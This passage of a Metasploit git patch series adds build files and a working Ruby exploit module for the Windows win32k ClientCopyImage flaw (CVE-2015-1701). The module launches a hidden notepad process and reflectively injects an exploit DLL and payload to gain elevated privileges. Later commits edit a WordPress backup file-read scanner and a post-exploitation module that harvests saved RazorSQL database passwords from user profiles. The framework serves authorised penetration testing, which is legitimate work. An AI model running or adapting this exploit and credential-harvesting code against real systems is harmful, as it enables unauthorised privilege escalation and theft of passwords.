+	_Out_		PVOID MemoryInformation,
+	_In_		SIZE_T MemoryInformationLength,
+	_Out_opt_	PSIZE_T ReturnLength
+	);
+
+NTSTATUS NTAPI NtReadVirtualMemory(
+	_In_		HANDLE ProcessHandle,
+	_In_opt_	PVOID BaseAddress,
+	_Out_		PVOID Buffer,
+	_In_		SIZE_T BufferSize,
+	_Out_opt_	PSIZE_T NumberOfBytesRead
+	);
+
+NTSTATUS NTAPI NtWriteVirtualMemory(
+	_In_ HANDLE ProcessHandle,
+	_In_opt_ PVOID BaseAddress,
+	_In_ VOID *Buffer,
+	_In_ SIZE_T BufferSize,
+	_Out_opt_ PSIZE_T NumberOfBytesWritten
+	);
+
+NTSTATUS NTAPI NtEnumerateKey(
+	_In_		HANDLE KeyHandle,
+	_In_		ULONG Index,
+	_In_		KEY_INFORMATION_CLASS KeyInformationClass,
+	_Out_opt_	PVOID KeyInformation,
+	_In_		ULONG Length,
+	_Out_		PULONG ResultLength
+	);
+
+NTSTATUS NTAPI NtCreatePort(
+	_Out_	PHANDLE PortHandle,
+	_In_	POBJECT_ATTRIBUTES ObjectAttributes,
+	_In_	ULONG MaxConnectionInfoLength,
+	_In_	ULONG MaxMessageLength,
+	_In_	ULONG MaxPoolUsage
+	);
+
+NTSTATUS NTAPI NtCompleteConnectPort(
+	_In_	HANDLE PortHandle
+	);
+
+NTSTATUS NTAPI NtListenPort(
+	_In_	HANDLE PortHandle,
+	_Out_	PPORT_MESSAGE ConnectionRequest
+	);
+
+NTSTATUS NTAPI NtReplyPort(
+	_In_	HANDLE PortHandle,
+	_In_	PPORT_MESSAGE ReplyMessage
+	);
+
+NTSTATUS NTAPI NtReplyWaitReplyPort(
+	_In_	HANDLE PortHandle,
+	_Inout_	PPORT_MESSAGE ReplyMessage
+	);
+
+NTSTATUS NTAPI NtRequestPort(
+	_In_	HANDLE PortHandle,
+	_In_	PPORT_MESSAGE RequestMessage
+	);
+
+NTSTATUS NTAPI NtRequestWaitReplyPort(
+	_In_	HANDLE PortHandle,
+	_In_	PPORT_MESSAGE RequestMessage,
+	_Out_	PPORT_MESSAGE ReplyMessage
+	);
+
+NTSTATUS NTAPI NtClosePort(
+	_In_	HANDLE PortHandle
+	);
+
+NTSTATUS NTAPI NtReplyWaitReceivePort(
+	_In_		HANDLE PortHandle,
+	_Out_opt_	PVOID *PortContext,
+	_In_opt_	PPORT_MESSAGE ReplyMessage,
+	_Out_		PPORT_MESSAGE ReceiveMessage
+	);
+
+NTSTATUS NTAPI NtWriteRequestData(
+	_In_		HANDLE PortHandle,
+	_In_		PPORT_MESSAGE Message,
+	_In_		ULONG DataEntryIndex,
+	_In_		PVOID Buffer,
+	_In_		ULONG BufferSize,
+	_Out_opt_	PULONG NumberOfBytesWritten
+	);
+
+NTSTATUS NTAPI NtReadRequestData(
+	_In_		HANDLE PortHandle,
+	_In_		PPORT_MESSAGE Message,
+	_In_		ULONG DataEntryIndex,
+	_Out_		PVOID Buffer,
+	_In_		ULONG BufferSize,
+	_Out_opt_	PULONG NumberOfBytesRead
+	);
+
+NTSTATUS NTAPI NtConnectPort(
+	_Out_			PHANDLE PortHandle,
+	_In_			PUNICODE_STRING PortName,
+	_In_			PSECURITY_QUALITY_OF_SERVICE SecurityQos,
+	_Inout_opt_		PPORT_VIEW ClientView,
+	_Out_opt_		PREMOTE_PORT_VIEW ServerView,
+	_Out_opt_		PULONG MaxMessageLength,
+	_Inout_opt_		PVOID ConnectionInformation,
+	_Inout_opt_		PULONG ConnectionInformationLength
+	);
+
+NTSTATUS NTAPI NtAcceptConnectPort(
+	_Out_			PHANDLE PortHandle,
+	_In_opt_		PVOID PortContext,
+	_In_			PPORT_MESSAGE ConnectionRequest,
+	_In_			BOOLEAN AcceptConnection,
+	_Inout_opt_		PPORT_VIEW ServerView,
+	_Out_opt_		PREMOTE_PORT_VIEW ClientView
+	);
diff --git a/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.vcxproj b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.vcxproj
new file mode 100755
index 0000000000..b4534dd447
--- /dev/null
+++ b/external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.vcxproj
@@ -0,0 +1,245 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{24713BA3-D562-41EF-87FC-9D5E44DFF2F8}</ProjectGuid>
+    <RootNamespace>cve-2015-1701</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+    <GenerateManifest>false</GenerateManifest>
+    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
+    <CodeAnalysisRules />
+    <CodeAnalysisRuleAssemblies />
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2015_1701_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <TreatWarningAsError>true</TreatWarningAsError>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+exit 0</Command>
+    </PostBuildEvent>
+    <ResourceCompile>
+      <PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ResourceCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2015_1701_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <TreatWarningAsError>true</TreatWarningAsError>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+exit 0</Command>
+    </PostBuildEvent>
+    <ResourceCompile>
+      <PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ResourceCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2015_1701_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <TreatWarningAsError>true</TreatWarningAsError>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
+      <IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\cve-2015-1701.map</MapFileName>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>
+      </DataExecutionPrevention>
+      <ImportLibrary>$(OutDir)\cve-2015-1701.lib</ImportLibrary>
+      <TargetMachine>MachineX86</TargetMachine>
+      <Profile>false</Profile>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2015-1701\" GOTO COPY
+    mkdir "..\..\..\..\..\data\exploits\CVE-2015-1701\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2015-1701\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2015_1701_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <TreatWarningAsError>true</TreatWarningAsError>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
+      <IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\cve-2015-1701.map</MapFileName>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>
+      </DataExecutionPrevention>
+      <ImportLibrary>$(OutDir)\cve-2015-1701.lib</ImportLibrary>
+      <Profile>false</Profile>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.01 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2015-1701\" GOTO COPY
+    mkdir "..\..\..\..\..\data\exploits\CVE-2015-1701\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2015-1701\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2015-1701.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="cve-2015-1701.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2015-1701/make.msbuild b/external/source/exploits/cve-2015-1701/make.msbuild
new file mode 100755
index 0000000000..933e497485
--- /dev/null
+++ b/external/source/exploits/cve-2015-1701/make.msbuild
@@ -0,0 +1,18 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\cve-2015-1701.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x86;x64" />
+
+  <Target Name="x86">
+    <Message Text="Building CVE-2015-1701 client_copy_image x86 Release version" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+  </Target>
+
+  <Target Name="x64">
+    <Message Text="Building CVE-2015-1701 client_copy_image x64 Release version" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
+  </Target>
+</Project>
diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat
index fb39b2e3c5..53aaf45e4e 100755
--- a/external/source/exploits/make.bat
+++ b/external/source/exploits/make.bat
@@ -54,6 +54,13 @@ IF "%ERRORLEVEL%"=="0" (
   POPD
 )
 
+IF "%ERRORLEVEL%"=="0" (
+  ECHO "Building CVE-2015-1701 (copy_client_image)"
+  PUSHD CVE-2015-1701
+  msbuild.exe make.msbuild /target:%PLAT%
+  POPD
+)
+
 IF "%ERRORLEVEL%"=="0" (
   ECHO "Building CVE-2013-1300 (schlamperei)"
   PUSHD CVE-2013-1300
diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
new file mode 100644
index 0000000000..8c52337476
--- /dev/null
+++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'            => 'Windows ClientCopyImage Win32k Exploit',
+      'Description'     => %q{
+        This module exploits improper object handling in the win32k.sys kernel mode driver.
+        This module has been tested on vulnerable builds of Windows 7 x64 and x86. The
+        exploit should also work on earlier builds of windows.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          => [
+          'Unknown',    # vulnerability discovery and exploit in the wild
+          'hfirefox',   # Code released on github
+          'OJ Reeves'   # msf module
+        ],
+      'Arch'            => [ ARCH_X86, ARCH_X86_64 ],
+      'Platform'        => 'win',
+      'SessionTypes'    => [ 'meterpreter' ],
+      'DefaultOptions'  => {
+          'EXITFUNC'    => 'thread',
+        },
+      'Targets'         => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'Payload'         => {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'      =>
+        [
+          ['CVE', '2015-1701'],
+          ['MSB', 'MS15-051'],
+          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],
+          ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],
+          ['URL', 'https://technet.microsoft.com/library/security/MS15-051']
+        ],
+      'DisclosureDate'  => 'May 12 2015',
+      'DefaultTarget'   => 0
+    }))
+  end
+
+  def check
+    os = sysinfo["OS"]
+
+    if os !~ /windows/i
+      return Exploit::CheckCode::Unknown
+    end
+
+    if sysinfo["Architecture"] =~ /(wow|x)64/i
+      arch = ARCH_X86_64
+    elsif sysinfo["Architecture"] =~ /x86/i
+      arch = ARCH_X86
+    end
+
+    file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    return Exploit::CheckCode::Safe if build > 7601
+
+    return Exploit::CheckCode::Detected
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, "Exploit not available on this system.")
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
+      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+    elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
+      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+    end
+
+    print_status('Launching notepad to host the exploit...')
+    notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
+    begin
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      # Reader Sandbox won't allow to create a new process:
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      print_status('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    if target.arch.first == ARCH_X86
+      dll_file_name = 'cve-2015-1701.x86.dll'
+    else
+      dll_file_name = 'cve-2015-1701.x64.dll'
+    end
+
+    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)
+    library_path = ::File.expand_path(library_path)
+
+    print_status("Injecting exploit into #{process.pid}...")
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(process, payload.encoded)
+
+    # invoke the exploit, passing in the address of the payload that
+    # we want invoked on successful exploitation.
+    print_status('Payload injected. Executing exploit...')
+    process.thread.create(exploit_mem + offset, payload_mem)
+
+    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+  end
+
+end

From a6467f49ec5306ab8e8c0d0a3ddc5563f7358da0 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 3 Jun 2015 22:17:25 +1000
Subject: [PATCH 0289/1013] Update description

---
 .../exploits/windows/local/ms15_051_client_copy_image.rb   | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
index 8c52337476..02ce84169b 100644
--- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb
+++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb
@@ -21,8 +21,8 @@ class Metasploit3 < Msf::Exploit::Local
       'Name'            => 'Windows ClientCopyImage Win32k Exploit',
       'Description'     => %q{
         This module exploits improper object handling in the win32k.sys kernel mode driver.
-        This module has been tested on vulnerable builds of Windows 7 x64 and x86. The
-        exploit should also work on earlier builds of windows.
+        This module has been tested on vulnerable builds of Windows 7 x64 and x86, and
+        Windows 2008 R2 SP1 x64. The exploit should also work on earlier builds of windows.
       },
       'License'         => MSF_LICENSE,
       'Author'          => [
@@ -44,8 +44,7 @@ class Metasploit3 < Msf::Exploit::Local
           'Space'       => 4096,
           'DisableNops' => true
         },
-      'References'      =>
-        [
+      'References'      => [
           ['CVE', '2015-1701'],
           ['MSB', 'MS15-051'],
           ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],

From 24ec3b2fb5b0cc106d3f0b35b855b2290179993f Mon Sep 17 00:00:00 2001
From: Roberto Soares <robertoespreto@gmail.com>
Date: Wed, 3 Jun 2015 13:46:59 -0300
Subject: [PATCH 0290/1013] Changed vprint_error to fail_with method.

---
 modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
index 8cd632c729..9b667fde35 100644
--- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
     )
 
     unless res && res.body
-      vprint_error("#{peer} - Server did not respond in an expected way.")
+      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way.")
       return
     end
 

From b305fa62f4f837e27dcb68f612df5ef7047e6bd0 Mon Sep 17 00:00:00 2001
From: Roberto Soares <robertoespreto@gmail.com>
Date: Wed, 3 Jun 2015 14:46:59 -0300
Subject: [PATCH 0291/1013] Changed vprint_error when nothing was downloaded.

---
 modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
index 9b667fde35..95fb471c7f 100644
--- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
 
       print_good("#{peer} - File saved in: #{path}")
     else
-      print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.")
+      print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.")
     end
   end
 end

From 656f64d9bd5755a3ba060216f9d79159df1e61d8 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 3 Jun 2015 13:49:06 -0500
Subject: [PATCH 0292/1013] Update razorsql to use the new cred API

---
 .../windows/gather/credentials/razorsql.rb    | 97 ++++++++++++++-----
 1 file changed, 72 insertions(+), 25 deletions(-)

diff --git a/modules/post/windows/gather/credentials/razorsql.rb b/modules/post/windows/gather/credentials/razorsql.rb
index 23400579ac..4e7231c840 100644
--- a/modules/post/windows/gather/credentials/razorsql.rb
+++ b/modules/post/windows/gather/credentials/razorsql.rb
@@ -9,6 +9,7 @@ require 'msf/core/auxiliary/report'
 
 class Metasploit3 < Msf::Post
 
+  include Msf::Post::File
   include Msf::Auxiliary::Report
   include Msf::Post::Windows::UserProfiles
 
@@ -30,6 +31,48 @@ class Metasploit3 < Msf::Post
     ))
   end
 
+  def get_profiles
+    profiles = []
+    grab_user_profiles.each do |user|
+      next unless user['ProfileDir']
+      ['.razorsql\\data\\profiles.txt', 'AppData\Roaming\RazorSQL\data\profiles.txt'].each do |profile_path|
+        file = "#{user['ProfileDir']}\\#{profile_path}"
+        profiles << file if file?(file)
+      end
+    end
+
+    profiles
+  end
+
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+
   def run
     print_status("Checking All Users...")
     creds_tbl = Rex::Ui::Text::Table.new(
@@ -47,19 +90,17 @@ class Metasploit3 < Msf::Post
         ]
     )
 
-    grab_user_profiles().each do |user|
-      next if user['ProfileDir'] == nil
-      file= user['ProfileDir'] + "\\.razorsql\\data\\profiles.txt"
-      content = get_content(file)
-      if content and not content.empty?
-        creds = parse_content(creds_tbl, content, user['UserName'])
-        creds.each do |c|
-          creds_tbl << c
-        end
+    get_profiles.each do |profile_path|
+      content = get_content(profile_path)
+      next if content.blank?
